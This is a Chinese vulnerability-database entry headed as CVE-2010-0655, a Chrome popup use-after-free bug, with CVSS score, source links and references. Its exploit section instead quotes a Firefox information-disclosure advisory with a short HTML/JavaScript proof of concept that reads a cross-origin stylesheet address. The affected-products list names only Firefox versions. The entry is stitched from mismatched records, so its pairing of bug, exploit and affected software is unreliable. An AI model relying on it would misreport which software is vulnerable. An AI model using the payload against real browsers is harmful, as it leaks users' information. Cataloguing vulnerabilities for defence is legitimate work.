Google Chrome popup窗口 拒绝服务和任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118881 漏洞类型 资源管理错误
发布时间 2010-01-09 更新时间 2010-01-09
CVE编号 CVE-2010-0655 CNNVD-ID CNNVD-201002-177
漏洞平台 Multiple CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/33664
https://www.securityfocus.com/bid/38369
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201002-177
|漏洞详情
GoogleChrome是Google发布的一款浏览器。GoogleChrome存在释放后使用漏洞。远程攻击者在导航到不同站点过程中显示联锁的popup窗口时,可以通过相关向量,导致拒绝服务和执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/38369/info

Mozilla Firefox is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>
|受影响的产品
Mozilla Firefox 3.5.8 Mozilla Firefox 3.5.7 Mozilla Firefox 3.5.6 Mozilla Firefox 3.5.5 Mozilla Firefox 3.5.4 Mozilla Firefox 3.5.3 Mozilla Firefox 3.5.2
|参考资料

来源:googlechromereleases.blogspot.com
链接:http://googlechromereleases.blogspot.com/2010/01/stable-channel-update_25.html
来源:sites.google.com
链接:http://sites.google.com/a/chromium.org/dev/Home/chromium-security/chromium-security-bugs
来源:SECTRACK
名称:1023506
链接:http://securitytracker.com/id?1023506
来源:MISC
链接:http://secunia.com/secunia_research/2009-65/
来源:code.google.com
链接:http://code.google.com/p/chromium/issues/detail?id=12523